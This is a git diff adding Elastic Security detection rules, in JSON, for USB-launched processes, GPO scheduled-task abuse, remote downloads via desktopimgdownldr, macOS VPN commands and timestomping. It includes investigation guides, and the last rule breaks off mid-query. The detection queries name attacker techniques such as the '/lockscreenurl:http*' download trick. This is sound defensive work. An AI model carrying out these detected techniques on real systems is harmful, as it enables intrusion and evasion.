a/packages/security_detection_engine/kibana/security_rule/1542fa53-955e-4330-8e4d-b2d812adeb5f_2.json b/packages/security_detection_engine/kibana/security_rule/1542fa53-955e-4330-8e4d-b2d812adeb5f_2.json new file mode 100644 index 00000000000..4d64cd5297e --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/1542fa53-955e-4330-8e4d-b2d812adeb5f_2.json @@ -0,0 +1,95 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies process execution from a removable media and by an unusual process. Adversaries may move onto systems, possibly those on disconnected or air-gapped networks, by copying malware to removable media and taking advantage of Autorun features when the media is inserted into a system and executes.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Execution from a Removable Media with Network Connection", + "query": "sequence by process.entity_id with maxspan=5m\n [process where host.os.type == \"windows\" and event.action == \"start\" and\n \n /* Direct Exec from USB */\n (process.Ext.device.bus_type : \"usb\" or process.Ext.device.product_id : \"USB *\") and\n (process.code_signature.trusted == false or process.code_signature.exists == false) and \n \n not process.code_signature.status : (\"errorExpired\", \"errorCode_endpoint*\")]\n [network where host.os.type == \"windows\" and event.action == \"connection_attempted\"]\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": false, + "name": "process.Ext.device.bus_type", + "type": "unknown" + }, + { + "ecs": false, + "name": "process.Ext.device.product_id", + "type": "unknown" + }, + { + "ecs": true, + "name": "process.code_signature.exists", + "type": "boolean" + }, + { + "ecs": true, + "name": "process.code_signature.status", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.code_signature.trusted", + "type": "boolean" + }, + { + "ecs": true, + "name": "process.entity_id", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "1542fa53-955e-4330-8e4d-b2d812adeb5f", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Initial Access", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0001", + "name": "Initial Access", + "reference": "https://attack.mitre.org/tactics/TA0001/" + }, + "technique": [ + { + "id": "T1091", + "name": "Replication Through Removable Media", + "reference": "https://attack.mitre.org/techniques/T1091/" + } + ] + } + ], + "type": "eql", + "version": 2 + }, + "id": "1542fa53-955e-4330-8e4d-b2d812adeb5f_2", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/15a8ba77-1c13-4274-88fe-6bd14133861e_110.json b/packages/security_detection_engine/kibana/security_rule/15a8ba77-1c13-4274-88fe-6bd14133861e_110.json new file mode 100644 index 00000000000..1c2db4a3b81 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/15a8ba77-1c13-4274-88fe-6bd14133861e_110.json @@ -0,0 +1,142 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Detects the modification of Group Policy Object attributes to execute a scheduled task in the objects controlled by the GPO.", + "index": [ + "winlogbeat-*", + "logs-system.*", + "logs-windows.*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Scheduled Task Execution at Scale via GPO", + "note": "## Triage and analysis\n\n### Investigating Scheduled Task Execution at Scale via GPO\n\nGroup Policy Objects (GPOs) can be used by attackers to execute scheduled tasks at scale to compromise objects controlled by a given GPO. This is done by changing the contents of the `\\Machine\\Preferences\\ScheduledTasks\\ScheduledTasks.xml` file.\n\n#### Possible investigation steps\n\n- This attack abuses a legitimate mechanism of Active Directory, so it is important to determine whether the activity is legitimate and the administrator is authorized to perform this operation.\n- Retrieve the contents of the `ScheduledTasks.xml` file, and check the `` and `` XML tags for any potentially malicious commands or binaries.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Scope which objects may be compromised by retrieving information about which objects are controlled by the GPO.\n\n### False positive analysis\n\n- Verify if the execution is allowed and done under change management, and if the execution is legitimate.\n\n### Related rules\n\n- Group Policy Abuse for Privilege Addition - b9554892-5e0e-424b-83a0-5aef95aa43bf\n- Startup/Logon Script added to Group Policy Object - 16fac1a1-21ee-4ca6-b720-458e3855d046\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- The investigation and containment must be performed in every computer controlled by the GPO, where necessary.\n- Remove the script from the GPO.\n- Check if other GPOs have suspicious scheduled tasks attached.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "(event.code: \"5136\" and winlog.event_data.AttributeLDAPDisplayName:(\"gPCMachineExtensionNames\" or \"gPCUserExtensionNames\") and\n winlog.event_data.AttributeValue:(*CAB54552-DEEA-4691-817E-ED4A4D1AFC72* and *AADCED64-746C-4633-A97C-D61349046527*))\nor\n(event.code: \"5145\" and winlog.event_data.ShareName: \"\\\\\\\\*\\\\SYSVOL\" and winlog.event_data.RelativeTargetName: *ScheduledTasks.xml and\n (message: WriteData or winlog.event_data.AccessList: *%%4417*))\n", + "references": [ + "https://github.com/atc-project/atc-data/blob/master/docs/Logging_Policies/LP_0025_windows_audit_directory_service_changes.md", + "https://github.com/atc-project/atc-data/blob/f2bbb51ecf68e2c9f488e3c70dcdd3df51d2a46b/docs/Logging_Policies/LP_0029_windows_audit_detailed_file_share.md", + "https://labs.f-secure.com/tools/sharpgpoabuse", + "https://twitter.com/menasec1/status/1106899890377052160", + "https://github.com/SigmaHQ/sigma/blob/master/rules/windows/builtin/security/win_gpo_scheduledtasks.yml" + ], + "related_integrations": [ + { + "package": "system", + "version": "^1.6.4" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.code", + "type": "keyword" + }, + { + "ecs": true, + "name": "message", + "type": "match_only_text" + }, + { + "ecs": false, + "name": "winlog.event_data.AccessList", + "type": "unknown" + }, + { + "ecs": false, + "name": "winlog.event_data.AttributeLDAPDisplayName", + "type": "unknown" + }, + { + "ecs": false, + "name": "winlog.event_data.AttributeValue", + "type": "unknown" + }, + { + "ecs": false, + "name": "winlog.event_data.RelativeTargetName", + "type": "unknown" + }, + { + "ecs": false, + "name": "winlog.event_data.ShareName", + "type": "unknown" + } + ], + "risk_score": 47, + "rule_id": "15a8ba77-1c13-4274-88fe-6bd14133861e", + "setup": "## Setup\n\nThe 'Audit Detailed File Share' audit policy must be configured (Success Failure).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nObject Access >\nAudit Detailed File Share (Success,Failure)\n```\n\nThe 'Audit Directory Service Changes' audit policy must be configured (Success Failure).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nDS Access >\nAudit Directory Service Changes (Success,Failure)\n```\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Privilege Escalation", + "Tactic: Lateral Movement", + "Data Source: Active Directory", + "Resources: Investigation Guide", + "Use Case: Active Directory Monitoring" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1053", + "name": "Scheduled Task/Job", + "reference": "https://attack.mitre.org/techniques/T1053/", + "subtechnique": [ + { + "id": "T1053.005", + "name": "Scheduled Task", + "reference": "https://attack.mitre.org/techniques/T1053/005/" + } + ] + }, + { + "id": "T1484", + "name": "Domain Policy Modification", + "reference": "https://attack.mitre.org/techniques/T1484/", + "subtechnique": [ + { + "id": "T1484.001", + "name": "Group Policy Modification", + "reference": "https://attack.mitre.org/techniques/T1484/001/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0008", + "name": "Lateral Movement", + "reference": "https://attack.mitre.org/tactics/TA0008/" + }, + "technique": [ + { + "id": "T1570", + "name": "Lateral Tool Transfer", + "reference": "https://attack.mitre.org/techniques/T1570/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 110 + }, + "id": "15a8ba77-1c13-4274-88fe-6bd14133861e_110", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/15c0b7a7-9c34-4869-b25b-fa6518414899_111.json b/packages/security_detection_engine/kibana/security_rule/15c0b7a7-9c34-4869-b25b-fa6518414899_111.json new file mode 100644 index 00000000000..707ed2d5593 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/15c0b7a7-9c34-4869-b25b-fa6518414899_111.json @@ -0,0 +1,100 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the desktopimgdownldr utility being used to download a remote file. An adversary may use desktopimgdownldr to download arbitrary files as an alternative to certutil.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Remote File Download via Desktopimgdownldr Utility", + "note": "## Triage and analysis\n\n### Investigating Remote File Download via Desktopimgdownldr Utility\n\nAttackers commonly transfer tooling or malware from external systems into a compromised environment using the command and control channel. However, they can also abuse signed utilities to drop these files.\n\nThe `Desktopimgdownldr.exe` utility is used to to configure lockscreen/desktop image, and can be abused with the `lockscreenurl` argument to download remote files and tools, this rule looks for this behavior.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n> This investigation guide uses the [Investigate Markdown Plugin](https://www.elastic.co/guide/en/security/master/interactive-investigation-guides.html) introduced in Elastic Stack version 8.8.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n - !{investigate{\"label\":\"Alerts associated with the user in the last 48h\",\"providers\":[[{\"excluded\":false,\"field\":\"event.kind\",\"queryType\":\"phrase\",\"value\":\"signal\",\"valueType\":\"string\"},{\"excluded\":false,\"field\":\"user.id\",\"queryType\":\"phrase\",\"value\":\"{{user.id}}\",\"valueType\":\"string\"}]],\"relativeFrom\":\"now-48h/h\",\"relativeTo\":\"now\"}}\n - !{investigate{\"label\":\"Alerts associated with the host in the last 48h\",\"providers\":[[{\"excluded\":false,\"field\":\"event.kind\",\"queryType\":\"phrase\",\"value\":\"signal\",\"valueType\":\"string\"},{\"excluded\":false,\"field\":\"host.name\",\"queryType\":\"phrase\",\"value\":\"{{host.name}}\",\"valueType\":\"string\"}]],\"relativeFrom\":\"now-48h/h\",\"relativeTo\":\"now\"}}\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Check the reputation of the domain or IP address used to host the downloaded file or if the user downloaded the file from an internal system.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - !{investigate{\"label\":\"Investigate the Subject Process Network Events\",\"providers\":[[{\"excluded\":false,\"field\":\"process.entity_id\",\"queryType\":\"phrase\",\"value\":\"{{process.entity_id}}\",\"valueType\":\"string\"},{\"excluded\":false,\"field\":\"event.category\",\"queryType\":\"phrase\",\"value\":\"network\",\"valueType\":\"string\"}]]}}\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unusual but can be done by administrators. Benign true positives (B-TPs) can be added as exceptions if necessary.\n- Analysts can dismiss the alert if the downloaded file is a legitimate image.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n (process.name : \"desktopimgdownldr.exe\" or ?process.pe.original_file_name == \"desktopimgdownldr.exe\") and\n process.args : \"/lockscreenurl:http*\"\n", + "references": [ + "https://labs.sentinelone.com/living-off-windows-land-a-new-native-file-downldr/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + }, + { + "package": "system", + "version": "^1.6.4" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "15c0b7a7-9c34-4869-b25b-fa6518414899", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Command and Control", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0011", + "name": "Command and Control", + "reference": "https://attack.mitre.org/tactics/TA0011/" + }, + "technique": [ + { + "id": "T1105", + "name": "Ingress Tool Transfer", + "reference": "https://attack.mitre.org/techniques/T1105/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 111 + }, + "id": "15c0b7a7-9c34-4869-b25b-fa6518414899_111", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/15c0b7a7-9c34-4869-b25b-fa6518414899_112.json b/packages/security_detection_engine/kibana/security_rule/15c0b7a7-9c34-4869-b25b-fa6518414899_112.json new file mode 100644 index 00000000000..77e3a238865 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/15c0b7a7-9c34-4869-b25b-fa6518414899_112.json @@ -0,0 +1,100 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the desktopimgdownldr utility being used to download a remote file. An adversary may use desktopimgdownldr to download arbitrary files as an alternative to certutil.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.process-*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Remote File Download via Desktopimgdownldr Utility", + "note": "## Triage and analysis\n\n### Investigating Remote File Download via Desktopimgdownldr Utility\n\nAttackers commonly transfer tooling or malware from external systems into a compromised environment using the command and control channel. However, they can also abuse signed utilities to drop these files.\n\nThe `Desktopimgdownldr.exe` utility is used to to configure lockscreen/desktop image, and can be abused with the `lockscreenurl` argument to download remote files and tools, this rule looks for this behavior.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n> This investigation guide uses the [Investigate Markdown Plugin](https://www.elastic.co/guide/en/security/master/interactive-investigation-guides.html) introduced in Elastic Stack version 8.8.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n - !{investigate{\"label\":\"Alerts associated with the user in the last 48h\",\"providers\":[[{\"excluded\":false,\"field\":\"event.kind\",\"queryType\":\"phrase\",\"value\":\"signal\",\"valueType\":\"string\"},{\"excluded\":false,\"field\":\"user.id\",\"queryType\":\"phrase\",\"value\":\"{{user.id}}\",\"valueType\":\"string\"}]],\"relativeFrom\":\"now-48h/h\",\"relativeTo\":\"now\"}}\n - !{investigate{\"label\":\"Alerts associated with the host in the last 48h\",\"providers\":[[{\"excluded\":false,\"field\":\"event.kind\",\"queryType\":\"phrase\",\"value\":\"signal\",\"valueType\":\"string\"},{\"excluded\":false,\"field\":\"host.name\",\"queryType\":\"phrase\",\"value\":\"{{host.name}}\",\"valueType\":\"string\"}]],\"relativeFrom\":\"now-48h/h\",\"relativeTo\":\"now\"}}\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Check the reputation of the domain or IP address used to host the downloaded file or if the user downloaded the file from an internal system.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - !{investigate{\"label\":\"Investigate the Subject Process Network Events\",\"providers\":[[{\"excluded\":false,\"field\":\"process.entity_id\",\"queryType\":\"phrase\",\"value\":\"{{process.entity_id}}\",\"valueType\":\"string\"},{\"excluded\":false,\"field\":\"event.category\",\"queryType\":\"phrase\",\"value\":\"network\",\"valueType\":\"string\"}]]}}\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unusual but can be done by administrators. Benign true positives (B-TPs) can be added as exceptions if necessary.\n- Analysts can dismiss the alert if the downloaded file is a legitimate image.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n (process.name : \"desktopimgdownldr.exe\" or ?process.pe.original_file_name == \"desktopimgdownldr.exe\") and\n process.args : \"/lockscreenurl:http*\"\n", + "references": [ + "https://labs.sentinelone.com/living-off-windows-land-a-new-native-file-downldr/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + }, + { + "package": "system", + "version": "^1.6.4" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "15c0b7a7-9c34-4869-b25b-fa6518414899", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Command and Control", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0011", + "name": "Command and Control", + "reference": "https://attack.mitre.org/tactics/TA0011/" + }, + "technique": [ + { + "id": "T1105", + "name": "Ingress Tool Transfer", + "reference": "https://attack.mitre.org/techniques/T1105/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 112 + }, + "id": "15c0b7a7-9c34-4869-b25b-fa6518414899_112", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/15dacaa0-5b90-466b-acab-63435a59701a_107.json b/packages/security_detection_engine/kibana/security_rule/15dacaa0-5b90-466b-acab-63435a59701a_107.json new file mode 100644 index 00000000000..68a35c50a4d --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/15dacaa0-5b90-466b-acab-63435a59701a_107.json @@ -0,0 +1,87 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the execution of macOS built-in commands to connect to an existing Virtual Private Network (VPN). Adversaries may use VPN connections to laterally move and control remote systems on a network.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Virtual Private Network Connection Attempt", + "query": "process where host.os.type == \"macos\" and event.type in (\"start\", \"process_started\") and\n (\n (process.name : \"networksetup\" and process.args : \"-connectpppoeservice\") or\n (process.name : \"scutil\" and process.args : \"--nc\" and process.args : \"start\") or\n (process.name : \"osascript\" and process.command_line : \"osascript*set VPN to service*\")\n )\n", + "references": [ + "https://github.com/rapid7/metasploit-framework/blob/master/modules/post/osx/manage/vpn.rb", + "https://www.unix.com/man-page/osx/8/networksetup/", + "https://superuser.com/questions/358513/start-configured-vpn-from-command-line-osx" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.command_line", + "type": "wildcard" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "15dacaa0-5b90-466b-acab-63435a59701a", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a macOS System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, for MacOS it is recommended to select \"Traditional Endpoints\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/current/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: macOS", + "Use Case: Threat Detection", + "Tactic: Lateral Movement", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0008", + "name": "Lateral Movement", + "reference": "https://attack.mitre.org/tactics/TA0008/" + }, + "technique": [ + { + "id": "T1021", + "name": "Remote Services", + "reference": "https://attack.mitre.org/techniques/T1021/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 107 + }, + "id": "15dacaa0-5b90-466b-acab-63435a59701a_107", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/166727ab-6768-4e26-b80c-948b228ffc06_5.json b/packages/security_detection_engine/kibana/security_rule/166727ab-6768-4e26-b80c-948b228ffc06_5.json new file mode 100644 index 00000000000..961a77cd9a0 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/166727ab-6768-4e26-b80c-948b228ffc06_5.json @@ -0,0 +1,99 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies modification of a file creation time. Adversaries may modify file time attributes to blend malicious content with existing files. Timestomping is a technique that modifies the timestamps of a file often to mimic files that are in trusted directories.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-windows.sysmon_operational-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "File Creation Time Changed", + "query": "file where host.os.type == \"windows\" and event.code : \"2\" and\n\n /* Requires Sysmon EventID 2 - File creation time change */\n event.action : \"File creation time changed*\" and \n \n not process.executable : \n (\"?:\\\\Program Files\\\\*\", \n \"?:\\\\Program Files (x86)\\\\*\", \n \"?:\\\\Windows\\\\system32\\\\cleanmgr.exe\",\n \"?:\\\\Windows\\\\system32\\\\msiexec.exe\", \n \"?:\\\\Windows\\\\syswow64\\\\msiexec.exe\", \n 